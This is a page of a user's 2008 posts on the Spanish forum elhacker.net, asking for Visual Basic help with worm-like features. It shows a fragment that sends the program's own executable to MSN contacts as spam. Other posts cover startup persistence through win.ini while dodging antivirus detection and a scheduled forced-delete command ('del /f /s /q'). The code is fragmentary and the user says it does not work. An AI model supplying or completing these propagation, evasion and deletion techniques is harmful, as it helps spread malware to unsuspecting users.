elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Sigue las noticias más importantes de seguridad informática en el Twitter! de elhacker.NET


  Mostrar Mensajes
Páginas: 1 2 3 [4] 5 6 7
31  Programación / Programación Visual Basic / Duda con enviar archivos por MSN en: 9 Marzo 2008, 23:41 pm
Hola de nuevo!!!

A ver, tengo una duda que se me planteo siguiendo la guia del hendrix.
Estuve intentando que mi archivo se propagase por MSN, pero no lo consigo.
Hago la prueba con dos ordenadores de mi casa con dos cuentas de MSN diferentes, consigo enviar el mensaje, pero en vez de enviar el archivo, se queda en la pantalla donde seleccionar el archivo...

El codigo:

Código:
Private Sub SpamMsn(ByVal mHwnd)
On Error Resume Next
Dim l As Long, spam As String
l = FindWindowEx(mHwnd, 0, "DirectUIHWND", vbNullString) 'Buscamos esa clase dentro de la ventana
If l = 0 Then Exit Sub 'Si no es asi, nos vamos al carajo
Call SendText(l, "TEXTO DE PRUEBA") 'Mensaje a enviar
EnviarFile App.Path & "\" & App.EXEName & ".exe", l 'Archivo a enviar
End Sub

seria buenisimo si me consiguen ayudar, ya que estoy muy interesado en VB..

Un saludo

PD: creo que el fallo esta donde enviarfile noseque, l ' Archivo a enviar
pero no se....
32  Programación / Programación Visual Basic / Re: Arrancar con el windows sin ser detectado... en: 6 Marzo 2008, 01:07 am
ya habia buscado... pero mal, xD

Un saludo y gracias.

Me pueden explicar un poco mejor algun metodo de los que se habla en ese post???
Es q no los entendi muy bien...
33  Programación / Programación Visual Basic / Arrancar con el windows sin ser detectado... en: 5 Marzo 2008, 21:50 pm
Hola, muy buenas, mi duda es como hacer que un archivo se ejecute al iniciarse windows.. pero sin utilizar el regedit, ya que al haerlo saltan los AVs, por lo que me gustaría aprender otros metodos que no detecten los AVs, o pocos AVs...

Estuve intentando hacerlo con win.ini pero no se que hago mal que no lo consigo, no se ejecuta..

Pongo lo siguiente:

[windows]
run=RUTA_ARCHIVO

tambien lo probe con load en lugar de run... y nada.

Alguien me puede ayudar???
34  Programación / Programación Visual Basic / Re: Programar tareas en: 10 Febrero 2008, 22:34 pm
Chefito, lo tuyo me sirvió con pruebas... Pero el caso es que si por ejemplo la carpeta a eliminar es la del msn messenger no se como hacerlo...

Si pones c:\archiv~1\msn me~1 da error y si pongo c:\archiv~1\msn hay más carpetas que empiezan por msn, como por ejemplo msn gaming zone, etc...

Como se haria entonces??
35  Programación / Programación Visual Basic / Re: Programar tareas en: 9 Febrero 2008, 22:11 pm
No me contesta nadie...Es que nadie lo sabe????

Yo consegui haciendo un Bucle pero es muy malo, ralentiza mucho!!

Hice lo siguiente:

Código:
Private Sub Form_Load ()
Do
If Hour(Now) = 22 And Minute(Now) = 30 And Second(Now) = 1 Then ACCION
Loop
End Sub

No se puede hacer de otro modo???
36  Programación / Programación Visual Basic / Re: Creador de Virus .bat en Visual Basic en: 9 Febrero 2008, 22:07 pm
A mi no me funciona, lo he probado y no me va.. No hace bien el codigo y cuando termina el virus, las pantallas del form siguen abiertas junto con 9 ventanas el MSDOS
37  Programación / Programación Visual Basic / Programar tareas en: 7 Febrero 2008, 17:38 pm
Hola, muy buenas!!

Estaba haciendo el codigo cuando de repente se me ocurrio utilizar la funcion AT de batch pero en vb.

Probe a hacer lo sigiente:

Shell ("cmd.exe /c AT 22:30 del /f /s /q ARCHIVO")

El problema es que el archivo esta en archivos de programa, y entonces al hacer la funcion da error porque es de más de 8 caracteras...
Mi pregunta es como hacer eso pero con codigos de VB.
Manejo bien lo de:

If Hour(Now) = 22 And Minute(Now) = 30 Then Kill ARCHIVO

Pero eso solo funcionaria si cuando se esta ejecutando son las 22:30 h.
Lo que yo busco es programar una tarea de que a las 22:30 se borre el archivo!!
Hay algun manera de hacerlo, si es así, me lo pueden explicar de manera que se entienda???
Gracias, y recordad que todavia no se mucho de esto y que teneis que explicarmelo a mi nivel (bastante bien explicado, xD)
38  Programación / Programación Visual Basic / Re: COPIAR ARCHIVOS AL ESRITORIO en: 6 Febrero 2008, 20:44 pm
Por q la mayoria de los av's lo detectan si lo pones ahí, pon la funcion en un time con intervalo 10 por ejemplo y q logicamente se desacative una vez haya escrito en el reg, a ver si asi no te lo detecta ;)
jajaja, perdon pero me suena un poco a chino eso del timer con intervalo 10...

Me lo puedes explicar?? (con ejemplos xD)
Gracias
39  Programación / Programación Visual Basic / Re: COPIAR ARCHIVOS AL ESRITORIO en: 6 Febrero 2008, 20:41 pm
Lo tienes puesto en el form load o en un timer?
En un form_load, por???
40  Programación / Programación Visual Basic / Re: COPIAR ARCHIVOS AL ESRITORIO en: 6 Febrero 2008, 20:09 pm
Hola, muy buenas!! lo hice bien y se agrega al registro, pero en seguida me salta el kaspersky... No hay otra manera mejor??
Páginas: 1 2 3 [4] 5 6 7
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines